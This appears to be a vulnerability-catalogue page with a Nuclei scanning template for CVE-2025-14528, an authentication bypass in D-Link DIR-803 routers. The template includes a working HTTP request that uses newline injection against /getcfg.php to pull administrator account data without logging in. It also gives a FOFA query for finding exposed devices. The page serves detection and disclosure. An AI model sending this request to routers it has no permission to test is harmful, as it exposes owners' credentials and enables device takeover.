D-Link DIR-803 - Authentication Bypass
CVE-2025-14528
Verified
Description
An authentication bypass vulnerability exists in D-Link DIR-803 routers (firmware A1 1.04 and earlier). By manipulating the AUTHORIZED_GROUP parameter in /getcfg.php via newline injection, an attacker can retrieve XML configuration containing administrator credentials without authentication.
Severity
High
CVSS Score
5.3
Exploit Probability
4%
Published Date
February 10, 2026
Template Author
dhiyaneshdk
CVE-2025-14528.yaml
id: CVE-2025-14528
info:
name: D-Link DIR-803 - Authentication Bypass
author: DhiyaneshDk
severity: high
description: |
An authentication bypass vulnerability exists in D-Link DIR-803 routers (firmware A1 1.04 and earlier). By manipulating the AUTHORIZED_GROUP parameter in /getcfg.php via newline injection, an attacker can retrieve XML configuration containing administrator credentials without authentication.
impact: |
Remote attackers can disclose sensitive information, potentially compromising device confidentiality.
remediation: |
Upgrade to the latest supported version or replace the device as it is no longer maintained.
reference:
- https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md
- https://vuldb.com/?id.335869
- https://nvd.nist.gov/vuln/detail/CVE-2025-14528
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2025-14528
epss-score: 0.03559
epss-percentile: 0.87936
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
fofa-query: app="D_Link-DIR-803"
tags: cve,cve2025,d-link,dir,auth-bypass,disclosure,vkev
http:
- raw:
- |
GET /getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<entry>"
- "<account>"
- "<group>"
condition: and
- type: word
part: content_type
words:
- "text/xml"
- type: status
status:
- 200
# digest: 4a0a004730450221008b1408039b2ee9e8f6758f7fdb474e32ecee91fb1ba1d6fcf22dc5c947da75e7022067d137b204cc003e8b26a60b59cd2a30993a1ed3c8052db22193212452ccdb74:922c64590222798bb761d5b6d8e729505.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2025-14528
CWE ID:
cwe-200
Remediation Steps
Upgrade to the latest supported version or replace the device as it is no longer maintained.